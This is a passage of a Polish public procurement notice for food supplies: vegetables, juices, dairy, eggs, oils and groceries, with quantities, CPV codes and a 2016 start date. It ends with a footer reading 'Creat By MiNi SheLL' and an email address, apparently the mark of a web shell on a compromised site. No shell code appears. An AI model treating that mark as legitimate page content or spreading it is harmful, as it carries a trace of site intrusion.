51. Sałata, szt. 2; 52. Seler, kg 60; 54. Sok 100% 200ml kartonik ,bez zawartości cukru różne smaki, szt. 2000; 53. Sok owocowy 100% 300ml, plastikowe opakowanie, bez cukru, szt. 350; 55. Syrop owocowy 420 ml, szt. 20; 56. Szczypiorek pczek, szt 8; 57. Szpinak mrożony siekany 450g, szt. 120; 58. Truskawka mrożona 450g, szt. 20; 59. Ziemniaki, kg 3000; 60. Ziemniaki nowe, kg 500;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> OLEJE TŁUSZCZE ZWIERZĘCE I ROŚLINNE, PRODUKTY MLECZARSKIE I JAJA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Jaja rozmiar L, szt 4000; 2. Jogurt 115g , do 10g cukru w 100g produktu, szt 300; 3. Jogurt do picia owocowy 250g do 10g cukru w 100g produktu, szt 300; 4. Jogurt kremowy z dodatkiem owocowego musu 110g do 10g cukru w 100g produktu, Szt 200; 5. Jogurt naturalny 1,5 % tłuszczu 400 ml, szt 40; 6. Jogurt owocowy 125g, do 10g cukru w 100g produktu, szt 200; 7. Jogurt owocowy- 250g, do 10g cukru w 100g produktu, szt 500; 8. Jogurt owocowy 80g, do 10g cukru w 100g produktu, szt 100; 9. Jogurt owocowy do picia 200gdo 10g cukru w 100g produktu, szt 100; 10. Kefir 400ml, szt 150; 11. Margaryna mleczna do pieczenia i duszenia, opakowanie 250g, zawartość tłuszczu min. 70%, szt 600; 12. Masło 200g, zawartość tłuszczu min. 82%, szt 1200; 13. Mleko 2%  l 600; 14. Napój mleczny owocowy 180g do 10g cukru na 100g produktu, szt 300; 15. Olej roślinny rafinowany o zawartości kwasów jednonienasyconych powyżej 50% i zawartości kwasów wielonienasyconych poniżej 40% l 400; 16. Ser biały krajanka półtłusty, kg 280; 17. Ser żółty krojony, kg 60; 18. Serek homogenio-wany 120g,  do  10g cukru w 100g produktu , szt 100; 19. Serek homogenio-wany 150g, wartość energetyczna w 100g produktu-144 kcal , szt 200; 20. Serek topiony 100g(zwykły lub smakowy), szt 300; 21. Serek twarogowy 150g, szt 10; 22. Śmietana 12% ,500g , wartość energ. w 100 ml-134 kcal,  szt 250; 23. Śmietana 30% 400ml, szt 10; 24. Śmietana zakwaszana 400ml 18%, szt 280;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.40.00.00-2, 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> POZOSTAŁE PRODUKTY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Baton mleczno zbożowy 22g, szt. 20; 2. Baton z płatków zbożowych w polewie mlecznej 25g,  szt 10; 4. Batonik z orzechowym nadzieniem  43g, op 20; 5. Bazylia 20g, szt 10; 6. Biszkopty okrągłe 200g, szt 40; 7. Biszkopty podłużne opak. 140g, szt 40; 8. Budyń z cukrem,60g wartość energ. po przyrządzeniu 85 kcal w 100g produktu, zawartość cukru w 100g-8,7g, szt 150; 9. Cukier, kg 800; 10. Cukier waniliowy 10 g, szt 100; 11. Cynamon sypki 15 g , szt 50; 12. Cytrynka 1l. , szt	200; 13. Drożdże 100g, szt 10; 14. Galaretka 100 g , wartość energ. po przyrządzeniu-49 kcal w 100g, zawartość cukru w 100g-do 10g, szt 150; 15. Gałka muszkatowa 10 g, szt 10; 16. Groszek ptysiowy 200g, Szt 5; 17. Herbata 100g, szt 500; 18. Herbata owocowa 45g, szt	150; 19. Herbatniki małe 50g, szt 150; 20. Herbatniki sezamowe 150g, szt 10; 21. Herbatnikowe ciasteczka, ze słonecznikiem, szt 40; 22. Kakao ciemne, bez cukru, 200g, o zawartości tłuszczu 10-12%, szt	20; 23. Kasza gryczana 1kg, kg 120; 24. Kasza jaglana, kg 4; 25. Kasza jęczmienna 1 kg, kg 30; 26. Kasza manna 1kg, kg 10; 27. Kawa zbożowa drobno mielona 120g, szt 15; 28. Kawa zbożowa 150 g  wartość energ w 100g 331 kcal białko 4,3g	szt	15; 29. Ketchup łagodny,500 g, wartość energ. w 100g- 94 kcal, zawartość koncentratu pomidor- 120%, szt 30; 30. Krem czekoladowo-orzechowy 630g, zawiera 13% orzechów laskowych, wartość energ. 544 kcal w 100g produktu	Szt	10; 31. Kruche ciastka maślane 190g, szt 15; 32. Kurkuma 100g, szt 10; 33. Liść laurowy 6g, szt 20; 34. Lubczyk, szt 20; 35. Majeranek 10g, szt 20; 36. Majonez lekki 400ml, szt 40; 37. Majonez ,wartość energ. 630 kcal w 100g produktu, zawartość tłuszczu w 100g produktu- 68 g 700ml szt	; 38. Makaron domowy,250g zawartość jaj- 23,8%, szt 50; 39. Makaron łazanki, 500 g wartość energ. w 100g produktu- 375 kcal, zawartość tłuszczu- 1,7g w 100g produktu, kg 30; 40. Makaron świderki 500 g wartość energ. w 100g produktu- 375 kcal, zawartość tłuszczu- 1,7g w 100g produktu, kg 180; 41. Makaron zacierka 250g	szt 150; 42. Mąka kukurydziana 1kg, kg 10; 43. Mąka pszenna 1 kg, kg 180; 44. Mąka ziemniaczana Superior 1 kg, kg 150; 45. Miód 300g, szt	5; 46. Mleczna kanapka, wartość energ. 420 kcal w 100g, zawartość mleka pasteryzowanego- 40%, szt 40; 47. Musli 350g 70% płatków zbożowy, 30% owoców	szt	4; 48 .Musztarda delikatesowa 1l wartość energ w 100g 113 kcal, szt 3; 49. Napój dla dzieci 300 ml, nie zawiera sztucznych barwników,konserwantów i cukru opakowanie plastikowe	szt 300; 50. Ocet 10% 0,5 l, szt 30; 51. Papryka słodka 20g szt 100; 52. Pieprz 20 g, szt 100; 53. Płatki kukurydziane 250g , szt 10; 54. Płatki owsiane 0,5 kg, szt	10; 55. Płatki śniadaniowe czekoladowe 500g, kakao-8,6%,do 10 g cukru w 100g produktu, wartość energ. 382 kcal w 100g produktu, szt 30; 56. Przyprawa do zup i sosów typu Maga lub równoważny  850ml, szt 50; 57. Przyprawa uniwersalna do potraw 150g, jarzynka bez soli i glutaminianu, szt 300; 58. Rogal z nadzieniem , 65 g, szt	40; 59. Ryż sypki długoziarnisty 1 kg, kg 180; 60. Sezam 100g, szt 20; 61. Sezamki różne smaki 27g, szt 30; 62. Soczek owocowy dla dzieci, karton 200 ml ,bez dodatku cukru różne smaki, szt	200; 63. Sos sojowy 1 l	szt 5; 64. Sól morska jodowo potasowa 1kg, kg 80; 65. Wafel zbożowe   szt 40; 66 .Wafel Mleczno orzechowy 25g, 548 kcal, szt	10; 67 .Wafel zbożowy w polewie czekoladowej, , szt 20; 68. Wafelek śmietankowy bez polewy 20g, szt 20; 69. Wafelek zbożowy w polewie mlecznej 36g , szt  10; 70. Wafle ryżowe 60g	szt 10; 71. Wafle suche ANDRUT 80g, szt 	4; 72. Wafle zbożowo ryżowe 60g, szt 4; 73. Ziele angielskie 15g	szt 20; 74. Zioła prowansalskie 20 g, szt 20; 75. Żurek kiszony  opak. kubek 0,5l	szt 80;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.60.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 04.01.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com